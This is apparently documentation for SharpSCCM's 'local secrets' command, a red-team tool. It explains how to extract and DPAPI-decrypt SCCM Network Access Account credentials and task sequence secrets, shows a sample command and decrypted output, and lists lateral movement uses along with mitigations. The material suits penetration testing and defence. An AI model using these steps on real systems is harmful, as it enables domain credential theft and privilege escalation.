Skip to main content

Overview

Get policy secrets (e.g., network access accounts, task sequences, and collection variables) stored locally in the WMI repository. This command extracts and decrypts DPAPI-protected credentials from the local SCCM client.
This command requires Local Administrators group membership on an SCCM client and involves accessing sensitive credentials.

Syntax

SharpSCCM local secrets [options]
Aliases: local naa

Parameters

method
string
required
The method of obtaining the DPAPI-protected blobs: wmi or disk
  • wmi: Extract from WMI repository namespace
  • disk: Extract from OBJECTS.DATA file (can retrieve historic secrets)
get-system
boolean
Escalate to SYSTEM via token duplication (default modifies LSA secrets registry permissions)

Examples

# Extract secrets from WMI namespace
SharpSCCM local secrets -m wmi

Extraction Methods

Extracts secrets from the root\ccm\policy\Machine\ActualConfig namespace:
  • Network Access Account credentials
  • Task sequence variables
  • Collection variables
  • Currently active secrets only
Extracts secrets from the CIM repository OBJECTS.DATA file:
  • All secrets including historic/deleted ones
  • Network Access Accounts
  • Task sequences with embedded credentials
  • More comprehensive but requires file system access

Output Format

The command outputs discovered secrets in structured format: 
[+] Secret: DPAPI_SYSTEM
    full: D88A555FF23B7BD491E17C729230CF72DADCB3208E8F4FFDCDC156EAA9BA4465BD207D865B66A2DA
     m/u: D88A555FF23B7BD491E17C729230CF72DADCB320 / 8E8F4FFDCDC156EAA9BA4465BD207D865B66A2DA

[+] SYSTEM master key cache:
    {1c383f70-2563-4e97-a0fb-6818e143f5cb}:833327774AA9CD63EEC2E0D6E37CFD6CABDA79F7

[+] Decrypting network access account credentials

    NetworkAccessUsername: APERTURE\networkaccess
    NetworkAccessPassword: P@ssw0rd

Types of Secrets Extracted

Domain accounts used by SCCM clients to access distribution points:
  • Often over-privileged domain accounts
  • Used when computer account cannot authenticate
  • Critical for lateral movement and privilege escalation
Variables embedded in task sequences that may contain:
  • Domain join credentials
  • Service account passwords
  • Application installation credentials
Variables assigned to device collections:
  • Environment-specific credentials
  • Application-specific secrets
  • Configuration passwords

Security Implications

Network Access Accounts are often over-privileged and can provide:
  • Domain authentication capabilities
  • Access to distribution points and file shares
  • Potential for lateral movement within the domain
  • Privilege escalation opportunities

DPAPI Decryption Process

  1. DPAPI_SYSTEM Secret: Retrieved from LSA secrets
  2. Master Key Cache: Extracted for SYSTEM account
  3. Blob Decryption: DPAPI-protected blobs are decrypted
  4. Credential Parsing: Plain-text credentials are extracted
  • Local Administrator: Required for registry access
  • SYSTEM Token: Optional for enhanced access
  • File System Access: Required for disk method

Common Use Cases

Extract NAA credentials for domain authentication and lateral movement.
Use disk method to recover deleted or changed credentials from the CIM repository.
Leverage discovered credentials for domain privilege escalation.

Mitigation Recommendations

Organizations should:
  • Enable Enhanced HTTP to eliminate NAA requirements
  • Use least privilege for any required NAAs
  • Regular rotation of NAA passwords
  • Monitor NAA usage for unauthorized access